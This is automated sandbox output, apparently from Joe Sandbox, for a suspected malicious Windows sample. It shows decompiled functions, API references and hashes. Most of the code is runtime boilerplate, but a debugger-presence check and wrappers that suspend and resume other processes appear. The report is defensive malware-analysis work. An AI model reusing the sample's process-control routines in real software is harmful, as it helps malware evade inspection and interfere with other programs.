                    • Opcode Fuzzy Hash: 77f7e0c17d7174778f9faecdcd6c78b00245cc7894719fe057abaf6e4b86e128
                    • Instruction Fuzzy Hash: 2D112431F8022033D81431794E5BBBE2906D783F54F54415BFA026A6C5EEDE6AD146DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00451AD3(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                    				signed int _v8;
                    				short _v248;
                    				signed int _v252;
                    				intOrPtr _v256;
                    				void* __ebp;
                    				signed int _t50;
                    				signed int _t58;
                    				signed int _t67;
                    				signed int _t69;
                    				signed int _t72;
                    				signed int _t73;
                    				intOrPtr _t75;
                    				signed int _t76;
                    				signed int _t84;
                    				signed int _t86;
                    				signed int _t87;
                    				signed int _t89;
                    				intOrPtr _t90;
                    				void* _t92;
                    				intOrPtr* _t113;
                    				void* _t117;
                    				intOrPtr* _t119;
                    				signed int _t123;
                    				signed int _t124;
                    				signed int _t125;
                    				signed int _t126;
                    				void* _t127;
                    				signed int* _t129;
                    				int _t132;
                    				signed int _t133;
                    				void* _t134;
                    
                    				_t50 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t50 ^ _t133;
                    				_t92 = E00447C05(__ebx, __ecx, __edx);
                    				_t129 =  *(E00447C05(_t92, __ecx, __edx) + 0x34c);
                    				_t132 = E00451DFB(_a4);
                    				asm("sbb ecx, ecx");
                    				if(GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
                    					_t58 = E00453424(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x54)),  &_v248);
                    					_v252 = _v252 & 0x00000000;
                    					__eflags = _t58;
                    					if(_t58 != 0) {
                    						L18:
                    						__eflags = ( *_t129 & 0x00000300) - 0x300;
                    						if(( *_t129 & 0x00000300) == 0x300) {
                    							L39:
                    							__eflags =  !( *_t129 >> 2) & 0x00000001;
                    							L40:
                    							return E004349BB(_v8 ^ _t133);
                    						}
                    						asm("sbb ecx, ecx");
                    						_t67 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                    						__eflags = _t67;
                    						if(_t67 != 0) {
                    							_t69 = E00453424(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                    							__eflags = _t69;
                    							if(_t69 != 0) {
                    								__eflags =  *(_t92 + 0x60);
                    								if( *(_t92 + 0x60) != 0) {
                    									goto L39;
                    								}
                    								__eflags =  *(_t92 + 0x5c);
                    								if( *(_t92 + 0x5c) == 0) {
                    									goto L39;
                    								}
                    								_t72 = E00453424(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                    								__eflags = _t72;
                    								if(_t72 != 0) {
                    									goto L39;
                    								}
                    								_push(_t129);
                    								_t73 = E00451F53(0, _t132, 0);
                    								__eflags = _t73;
                    								if(_t73 == 0) {
                    									goto L39;
                    								}
                    								 *_t129 =  *_t129 | 0x00000100;
                    								__eflags = _t129[1];
                    								L37:
                    								if(__eflags == 0) {
                    									_t129[1] = _t132;
                    								}
                    								goto L39;
                    							}
                    							 *_t129 =  *_t129 | 0x00000200;
                    							_t123 =  *_t129;
                    							__eflags =  *(_t92 + 0x60) - _t69;
                    							if( *(_t92 + 0x60) == _t69) {
                    								__eflags =  *(_t92 + 0x5c) - _t69;
                    								if( *(_t92 + 0x5c) == _t69) {
                    									goto L23;
                    								}
                    								_t113 =  *((intOrPtr*)(_t92 + 0x50));
                    								_v256 = _t113 + 2;
                    								do {
                    									_t75 =  *_t113;
                    									_t113 = _t113 + 2;
                    									__eflags = _t75 - _v252;
                    								} while (_t75 != _v252);
                    								__eflags = _t113 - _v256 >> 1 -  *(_t92 + 0x5c);
                    								if(_t113 - _v256 >> 1 !=  *(_t92 + 0x5c)) {
                    									_t69 = 0;
                    									goto L23;
                    								}
                    								_push(_t129);
                    								_t76 = E00451F53(_t92, _t132, 1);
                    								__eflags = _t76;
                    								if(_t76 == 0) {
                    									goto L39;
                    								}
                    								 *_t129 =  *_t129 | 0x00000100;
                    								_t69 = 0;
                    								L24:
                    								__eflags = _t129[1] - _t69;
                    								goto L37;
                    							}
                    							L23:
                    							_t124 = _t123 | 0x00000100;
                    							__eflags = _t124;
                    							 *_t129 = _t124;
                    							goto L24;
                    						}
                    						 *_t129 = _t67;
                    						L2:
                    						goto L40;
                    					}
                    					asm("sbb eax, eax");
                    					_t84 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                    					__eflags = _t84;
                    					if(_t84 == 0) {
                    						goto L1;
                    					}
                    					_t86 = E00453424(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                    					_pop(_t117);
                    					__eflags = _t86;
                    					if(_t86 != 0) {
                    						__eflags =  *_t129 & 0x00000002;
                    						if(( *_t129 & 0x00000002) != 0) {
                    							goto L18;
                    						}
                    						__eflags =  *(_t92 + 0x5c);
                    						if( *(_t92 + 0x5c) == 0) {
                    							L14:
                    							_t125 =  *_t129;
                    							__eflags = _t125 & 0x00000001;
                    							if((_t125 & 0x00000001) != 0) {
                    								goto L18;
                    							}
                    							_t87 = E00451F2F(_t132);
                    							__eflags = _t87;
                    							if(_t87 == 0) {
                    								goto L18;
                    							}
                    							_t126 = _t125 | 0x00000001;
                    							__eflags = _t126;
                    							 *_t129 = _t126;
                    							goto L17;
                    						}
                    						_t89 = E0044119E(_t92, _t117, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248,  *(_t92 + 0x5c));
                    						_t134 = _t134 + 0xc;
                    						__eflags = _t89;
                    						if(_t89 != 0) {
                    							goto L14;
                    						}
                    						 *_t129 =  *_t129 | 0x00000002;
                    						__eflags =  *_t129;
                    						_t129[2] = _t132;
                    						_t119 =  *((intOrPtr*)(_t92 + 0x50));
                    						_t127 = _t119 + 2;
                    						do {
                    							_t90 =  *_t119;
                    							_t119 = _t119 + 2;
                    							__eflags = _t90 - _v252;
                    						} while (_t90 != _v252);
                    						__eflags = _t119 - _t127 >> 1 -  *(_t92 + 0x5c);
                    						if(_t119 - _t127 >> 1 ==  *(_t92 + 0x5c)) {
                    							_t129[1] = _t132;
                    						}
                    					} else {
                    						 *_t129 =  *_t129 | 0x00000304;
                    						_t129[1] = _t132;
                    						L17:
                    						_t129[2] = _t132;
                    					}
                    					goto L18;
                    				}
                    				L1:
                    				 *_t129 =  *_t129 & 0x00000000;
                    				goto L2;
                    			}


































                    0x00451ade
                    0x00451ae5
                    0x00451af3
                    0x00451afb
                    0x00451b0a
                    0x00451b16
                    0x00451b2f
                    0x00451b46
                    0x00451b4b
                    0x00451b54
                    0x00451b56
                    0x00451c09
                    0x00451c12
                    0x00451c14
                    0x00451d06
                    0x00451d0d
                    0x00451d10
                    0x00451d20
                    0x00451d20
                    0x00451c27
                    0x00451c38
                    0x00451c3e
                    0x00451c40
                    0x00451c53
                    0x00451c5a
                    0x00451c5c
                    0x00451cc8
                    0x00451ccb
                    0x00000000
                    0x00000000
                    0x00451ccd
                    0x00451cd0
                    0x00000000
                    0x00000000
                    0x00451cdc
                    0x00451ce3
                    0x00451ce5
                    0x00000000
                    0x00000000
                    0x00451ce7
                    0x00451cec
                    0x00451cf4
                    0x00451cf6
                    0x00000000
                    0x00000000
                    0x00451cf8
                    0x00451cfe
                    0x00451d01
                    0x00451d01
                    0x00451d03
                    0x00451d03
                    0x00000000
                    0x00451d01
                    0x00451c5e
                    0x00451c64
                    0x00451c66
                    0x00451c69
                    0x00451c7b
                    0x00451c7e
                    0x00000000
                    0x00000000
                    0x00451c80
                    0x00451c86
                    0x00451c8c
                    0x00451c8c
                    0x00451c8f
                    0x00451c92
                    0x00451c92
                    0x00451ca3
                    0x00451ca6
                    0x00451cc2
                    0x00000000
                    0x00451cc2
                    0x00451ca8
                    0x00451cac
                    0x00451cb4
                    0x00451cb6
                    0x00000000
                    0x00000000
                    0x00451cb8
                    0x00451cbe
                    0x00451c73
                    0x00451c73
                    0x00000000
                    0x00451c73
                    0x00451c6b
                    0x00451c6b
                    0x00451c6b
                    0x00451c71
                    0x00000000
                    0x00451c71
                    0x00451c42
                    0x00451b34
                    0x00000000
                    0x00451b36
                    0x00451b6a
                    0x00451b78
                    0x00451b7e
                    0x00451b80
                    0x00000000
                    0x00000000
                    0x00451b8c
                    0x00451b92
                    0x00451b93
                    0x00451b95
                    0x00451ba2
                    0x00451ba5
                    0x00000000
                    0x00000000
                    0x00451ba7
                    0x00451bab
                    0x00451bef
                    0x00451bef
                    0x00451bf1
                    0x00451bf4
                    0x00000000
                    0x00000000
                    0x00451bf7
                    0x00451bfd
                    0x00451bff
                    0x00000000
                    0x00000000
                    0x00451c01
                    0x00451c01
                    0x00451c04
                    0x00000000
                    0x00451c04
                    0x00451bba
                    0x00451bbf
                    0x00451bc2
                    0x00451bc4
                    0x00000000
                    0x00000000
                    0x00451bc6
                    0x00451bc6
                    0x00451bc9
                    0x00451bcc
                    0x00451bcf
                    0x00451bd2
                    0x00451bd2
                    0x00451bd5
                    0x00451bd8
                    0x00451bd8
                    0x00451be5
                    0x00451be8
                    0x00451bea
                    0x00451bea
                    0x00451b97
                    0x00451b97
                    0x00451b9d
                    0x00451c06
                    0x00451c06
                    0x00451c06
                    0x00000000
                    0x00451b95
                    0x00451b31
                    0x00451b31
                    0x00000000

                    APIs
                      • Part of subcall function 00447C05: GetLastError.KERNEL32(?,00000000,00441655,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C09
                      • Part of subcall function 00447C05: _free.LIBCMT ref: 00447C3C
                      • Part of subcall function 00447C05: SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C7D
                      • Part of subcall function 00447C05: _abort.LIBCMT ref: 00447C83
                      • Part of subcall function 00447C05: _free.LIBCMT ref: 00447C64
                      • Part of subcall function 00447C05: SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C71
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00451B27
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00451B78
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00451C38
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorInfoLastLocale$_free$_abort
                    • String ID:
                    • API String ID: 2829624132-0
                    • Opcode ID: af7cfe5388b08ab7d5eb642ba84341d8533e2f8c0bd29e377a2370e3cb67927b
                    • Instruction ID: d8e4ea2592d3a94ee1acefe917b6277395881993a9c1d5858484602a6e4d9b57
                    • Opcode Fuzzy Hash: af7cfe5388b08ab7d5eb642ba84341d8533e2f8c0bd29e377a2370e3cb67927b
                    • Instruction Fuzzy Hash: 1C61C4715401079BDB299F25CC82BBA77A8EF04306F1041ABEC05CA662FB7DED59CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E0043B4E6(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                    				char _v0;
                    				signed int _v8;
                    				intOrPtr _v524;
                    				intOrPtr _v528;
                    				void* _v532;
                    				intOrPtr _v536;
                    				char _v540;
                    				intOrPtr _v544;
                    				intOrPtr _v548;
                    				intOrPtr _v552;
                    				intOrPtr _v556;
                    				intOrPtr _v560;
                    				intOrPtr _v564;
                    				intOrPtr _v568;
                    				intOrPtr _v572;
                    				intOrPtr _v576;
                    				intOrPtr _v580;
                    				intOrPtr _v584;
                    				char _v724;
                    				intOrPtr _v792;
                    				intOrPtr _v800;
                    				char _v804;
                    				struct _EXCEPTION_POINTERS _v812;
                    				signed int _t40;
                    				char* _t47;
                    				char* _t49;
                    				intOrPtr _t61;
                    				intOrPtr _t62;
                    				intOrPtr _t66;
                    				intOrPtr _t67;
                    				int _t68;
                    				intOrPtr _t69;
                    				signed int _t70;
                    
                    				_t69 = __esi;
                    				_t67 = __edi;
                    				_t66 = __edx;
                    				_t61 = __ebx;
                    				_t40 =  *0x47000c; // 0xc3a97826
                    				_t41 = _t40 ^ _t70;
                    				_v8 = _t40 ^ _t70;
                    				if(_a4 != 0xffffffff) {
                    					_push(_a4);
                    					E004345B2(_t41);
                    					_pop(_t62);
                    				}
                    				E004368A0(_t67,  &_v804, 0, 0x50);
                    				E004368A0(_t67,  &_v724, 0, 0x2cc);
                    				_v812.ExceptionRecord =  &_v804;
                    				_t47 =  &_v724;
                    				_v812.ContextRecord = _t47;
                    				_v548 = _t47;
                    				_v552 = _t62;
                    				_v556 = _t66;
                    				_v560 = _t61;
                    				_v564 = _t69;
                    				_v568 = _t67;
                    				_v524 = ss;
                    				_v536 = cs;
                    				_v572 = ds;
                    				_v576 = es;
                    				_v580 = fs;
                    				_v584 = gs;
                    				asm("pushfd");
                    				_pop( *_t22);
                    				_v540 = _v0;
                    				_t49 =  &_v0;
                    				_v528 = _t49;
                    				_v724 = 0x10001;
                    				_v544 =  *((intOrPtr*)(_t49 - 4));
                    				_v804 = _a8;
                    				_v800 = _a12;
                    				_v792 = _v0;
                    				_t68 = IsDebuggerPresent();
                    				SetUnhandledExceptionFilter(0);
                    				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                    					_push(_a4);
                    					E004345B2(_t57);
                    				}
                    				return E004349BB(_v8 ^ _t70);
                    			}




































                    0x0043b4e6
                    0x0043b4e6
                    0x0043b4e6
                    0x0043b4e6
                    0x0043b4f1
                    0x0043b4f6
                    0x0043b4f8
                    0x0043b500
                    0x0043b502
                    0x0043b505
                    0x0043b50a
                    0x0043b50a
                    0x0043b516
                    0x0043b529
                    0x0043b537
                    0x0043b53d
                    0x0043b543
                    0x0043b549
                    0x0043b54f
                    0x0043b555
                    0x0043b55b
                    0x0043b561
                    0x0043b567
                    0x0043b56d
                    0x0043b574
                    0x0043b57b
                    0x0043b582
                    0x0043b589
                    0x0043b590
                    0x0043b597
                    0x0043b598
                    0x0043b5a1
                    0x0043b5a7
                    0x0043b5aa
                    0x0043b5b0
                    0x0043b5bd
                    0x0043b5c6
                    0x0043b5cf
                    0x0043b5d8
                    0x0043b5e6
                    0x0043b5e8
                    0x0043b5fd
                    0x0043b609
                    0x0043b60c
                    0x0043b611
                    0x0043b620

                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,004742C0), ref: 0043B5DE
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,004742C0), ref: 0043B5E8
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,004742C0), ref: 0043B5F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 8364c5c92a424ceb326c742288fedc054b9f669a6a81e18d15f988448344708c
                    • Instruction ID: a9870ddc897b576748b1e112f1ebe2be8ef4fa6e66cb05651a83c1f19a9c0a7c
                    • Opcode Fuzzy Hash: 8364c5c92a424ceb326c742288fedc054b9f669a6a81e18d15f988448344708c
                    • Instruction Fuzzy Hash: C631D574901218ABCB21DF25D8897CDB7B8FF08310F5051EAE91CA7251EB349F818F49
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E00433255(HCRYPTPROV* __ecx, BYTE* __edx) {
                    				int _v12;
                    				void* _t6;
                    				BYTE* _t9;
                    				long** _t10;
                    
                    				_t10 = __ecx;
                    				_t9 = __edx;
                    				if(CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000) != 0) {
                    					if(CryptGenRandom( *_t10, _v12, _t9) != 0) {
                    						CryptReleaseContext( *_t10, 0);
                    						return 0;
                    					}
                    					_push(0xffffff98);
                    					L2:
                    					_pop(_t6);
                    					return _t6;
                    				}
                    				_push(0xffffff99);
                    				goto L2;
                    			}







                    0x00433260
                    0x00433262
                    0x0043326f
                    0x00433285
                    0x0043328f
                    0x00000000
                    0x00433295
                    0x00433287
                    0x00433273
                    0x00433273
                    0x00000000
                    0x00433273
                    0x00433271
                    0x00000000

                    APIs
                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00432EDD,00000034,?,?,00000000), ref: 00433267
                    • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00432F70,00000000,?,00000000), ref: 0043327D
                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00432F70,00000000,?,00000000,0041DC6F), ref: 0043328F
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$Context$AcquireRandomRelease
                    • String ID:
                    • API String ID: 1815803762-0
                    • Opcode ID: 0392184ee92a8c6baa262ce34c559f1c491196929782ea6e2fd18a039959421c
                    • Instruction ID: 386d6d0626d6bbff1ca0bc1f119ac135703d61f1d18141dba665f279826fc0b5
                    • Opcode Fuzzy Hash: 0392184ee92a8c6baa262ce34c559f1c491196929782ea6e2fd18a039959421c
                    • Instruction Fuzzy Hash: 2AE09231208310FAEB300F25BC08F172A54EB89B66F21067EF255E40E4DA618905855C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00442C95(int _a4) {
                    				void* _t14;
                    				void* _t16;
                    
                    				if(E004486D8(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                    					TerminateProcess(GetCurrentProcess(), _a4);
                    				}
                    				E00442D1A(_t14, _t16, _a4);
                    				ExitProcess(_a4);
                    			}





                    0x00442ca1
                    0x00442cbd
                    0x00442cbd
                    0x00442cc6
                    0x00442ccf

                    APIs
                    • GetCurrentProcess.KERNEL32(00000003,?,00442C6B,00000003,0046D8E8,0000000C,00442DC2,00000003,00000002,00000000,?,00445B28,00000003), ref: 00442CB6
                    • TerminateProcess.KERNEL32(00000000,?,00442C6B,00000003,0046D8E8,0000000C,00442DC2,00000003,00000002,00000000,?,00445B28,00000003), ref: 00442CBD
                    • ExitProcess.KERNEL32 ref: 00442CCF
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 2d04fc4fc310b859fc3976fb46f0d4b949228bb16cba3169edc118d31add566b
                    • Instruction ID: b5136f78928c5e1557500fac0c07be01260bb4a009a36d440652acbde0905d7a
                    • Opcode Fuzzy Hash: 2d04fc4fc310b859fc3976fb46f0d4b949228bb16cba3169edc118d31add566b
                    • Instruction Fuzzy Hash: CEE09231400A08AFDF216F55EE49A997F69AF40346F400469F809AB622CFB9D942DA98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E0041B5CA(long __ecx) {
                    				void* _t6;
                    				int _t7;
                    
                    				_t7 = 0;
                    				_t6 = OpenProcess(0x800, 0, __ecx);
                    				if(_t6 != 0) {
                    					_t7 =  *0x473b00(_t6);
                    					CloseHandle(_t6);
                    				}
                    				return _t7;
                    			}





                    0x0041b5cd
                    0x0041b5db
                    0x0041b5df
                    0x0041b5e9
                    0x0041b5eb
                    0x0041b5eb
                    0x0041b5f5

                    APIs
                    • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415C3D,00000000), ref: 0041B5D5
                    • NtResumeProcess.NTDLL(00000000), ref: 0041B5E2
                    • CloseHandle.KERNEL32(00000000,?,?,00415C3D,00000000), ref: 0041B5EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseHandleOpenResume
                    • String ID:
                    • API String ID: 3614150671-0
                    • Opcode ID: a2c6167e9eaaa27e3b21c01c29d45d1f69c381282c03a264470cef511126418a
                    • Instruction ID: 090b6a731ae225ffda99a113c1ad5616e02594943e7302d6e4add04220058a83
                    • Opcode Fuzzy Hash: a2c6167e9eaaa27e3b21c01c29d45d1f69c381282c03a264470cef511126418a
                    • Instruction Fuzzy Hash: 3AD05E36500122638220176A6C0C897ED69EBC2AA2706412EF404D22119E208801C6E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E0041B59E(long __ecx) {
                    				void* _t6;
                    				int _t7;
                    
                    				_t7 = 0;
                    				_t6 = OpenProcess(0x800, 0, __ecx);
                    				if(_t6 != 0) {
                    					_t7 =  *0x473b10(_t6);
                    					CloseHandle(_t6);
                    				}
                    				return _t7;
                    			}





                    0x0041b5a1
                    0x0041b5af
                    0x0041b5b3
                    0x0041b5bd
                    0x0041b5bf
                    0x0041b5bf
                    0x0041b5c9

                    APIs
                    • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415C18,00000000), ref: 0041B5A9
                    • NtSuspendProcess.NTDLL(00000000), ref: 0041B5B6
                    • CloseHandle.KERNEL32(00000000,?,?,00415C18,00000000), ref: 0041B5BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseHandleOpenSuspend
                    • String ID:
                    • API String ID: 1999457699-0
                    • Opcode ID: 0c855aa994f01cfaeb565a20ef11d9593d34ccaa7665746e74aaf84c39eb76a9
                    • Instruction ID: ac337d1f1458ea5d2e14f826bdeae23e5ab17713c0811cf73a98cb0626e3270e
                    • Opcode Fuzzy Hash: 0c855aa994f01cfaeb565a20ef11d9593d34ccaa7665746e74aaf84c39eb76a9
                    • Instruction Fuzzy Hash: B5D05E3260012163822117AA7C0DC97AD6DEFC1AA2706412AF404D22159E20880186E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E00434643(intOrPtr __edx) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed char _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				signed int _t59;
                    				signed int _t62;
                    				signed int _t63;
                    				intOrPtr _t65;
                    				signed int _t66;
                    				signed int _t68;
                    				intOrPtr _t73;
                    				intOrPtr* _t75;
                    				intOrPtr* _t77;
                    				intOrPtr _t84;
                    				intOrPtr* _t86;
                    				signed int _t91;
                    				signed int _t94;
                    
                    				_t84 = __edx;
                    				 *0x470d1c =  *0x470d1c & 0x00000000;
                    				 *0x470010 =  *0x470010 | 1;
                    				if(IsProcessorFeaturePresent(0xa) == 0) {
                    					L20:
                    					return 0;
                    				}
                    				_v24 = _v24 & 0x00000000;
                    				 *0x470010 =  *0x470010 | 0x00000002;
                    				 *0x470d1c = 1;
                    				_t86 =  &_v48;
                    				_push(1);
                    				asm("cpuid");
                    				_pop(_t73);
                    				 *_t86 = 0;
                    				 *((intOrPtr*)(_t86 + 4)) = 1;
                    				 *((intOrPtr*)(_t86 + 8)) = 0;
                    				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
                    				_v16 = _v48;
                    				_v8 = _v36 ^ 0x49656e69;
                    				_v12 = _v40 ^ 0x6c65746e;
                    				_push(1);
                    				asm("cpuid");
                    				_t75 =  &_v48;
                    				 *_t75 = 1;
                    				 *((intOrPtr*)(_t75 + 4)) = _t73;
                    				 *((intOrPtr*)(_t75 + 8)) = 0;
                    				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
                    				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
                    					L9:
                    					_t91 =  *0x470d20; // 0x2
                    					L10:
                    					_v32 = _v36;
                    					_t59 = _v40;
                    					_v8 = _t59;
                    					_v28 = _t59;
                    					if(_v16 >= 7) {
                    						_t65 = 7;
                    						_push(_t75);
                    						asm("cpuid");
                    						_t77 =  &_v48;
                    						 *_t77 = _t65;
                    						 *((intOrPtr*)(_t77 + 4)) = _t75;
                    						 *((intOrPtr*)(_t77 + 8)) = 0;
                    						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
                    						_t66 = _v44;
                    						_v24 = _t66;
                    						_t59 = _v8;
                    						if((_t66 & 0x00000200) != 0) {
                    							 *0x470d20 = _t91 | 0x00000002;
                    						}
                    					}
                    					if((_t59 & 0x00100000) != 0) {
                    						 *0x470010 =  *0x470010 | 0x00000004;
                    						 *0x470d1c = 2;
                    						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
                    							asm("xgetbv");
                    							_v20 = _t59;
                    							_v16 = _t84;
                    							if((_v20 & 0x00000006) == 6 && 0 == 0) {
                    								_t62 =  *0x470010; // 0x2f
                    								_t63 = _t62 | 0x00000008;
                    								 *0x470d1c = 3;
                    								 *0x470010 = _t63;
                    								if((_v24 & 0x00000020) != 0) {
                    									 *0x470d1c = 5;
                    									 *0x470010 = _t63 | 0x00000020;
                    								}
                    							}
                    						}
                    					}
                    					goto L20;
                    				}
                    				_t68 = _v48 & 0x0fff3ff0;
                    				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
                    					_t94 =  *0x470d20; // 0x2
                    					_t91 = _t94 | 0x00000001;
                    					 *0x470d20 = _t91;
                    					goto L10;
                    				} else {
                    					goto L9;
                    				}
                    			}



























                    0x00434643
                    0x00434646
                    0x00434654
                    0x00434663
                    0x004347e0
                    0x004347e6
                    0x004347e6
                    0x00434669
                    0x0043466f
                    0x0043467a
                    0x00434680
                    0x00434683
                    0x00434684
                    0x00434688
                    0x00434689
                    0x0043468b
                    0x0043468e
                    0x00434693
                    0x0043469c
                    0x004346ad
                    0x004346b8
                    0x004346be
                    0x004346bf
                    0x004346c7
                    0x004346cd
                    0x004346cf
                    0x004346d2
                    0x004346d5
                    0x004346d8
                    0x0043471d
                    0x0043471d
                    0x00434723
                    0x0043472a
                    0x0043472d
                    0x00434730
                    0x00434733
                    0x00434736
                    0x0043473a
                    0x0043473d
                    0x0043473e
                    0x00434743
                    0x00434746
                    0x00434748
                    0x0043474b
                    0x0043474e
                    0x00434751
                    0x00434759
                    0x0043475c
                    0x0043475f
                    0x00434764
                    0x00434764
                    0x0043475f
                    0x00434771
                    0x00434773
                    0x0043477a
                    0x00434789
                    0x00434794
                    0x00434797
                    0x0043479a
                    0x004347ab
                    0x004347b1
                    0x004347b6
                    0x004347b9
                    0x004347c7
                    0x004347cc
                    0x004347d1
                    0x004347db
                    0x004347db
                    0x004347cc
                    0x004347ab
                    0x00434789
                    0x00000000
                    0x00434771
                    0x004346dd
                    0x004346e7
                    0x0043470c
                    0x00434712
                    0x00434715
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 0043465C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
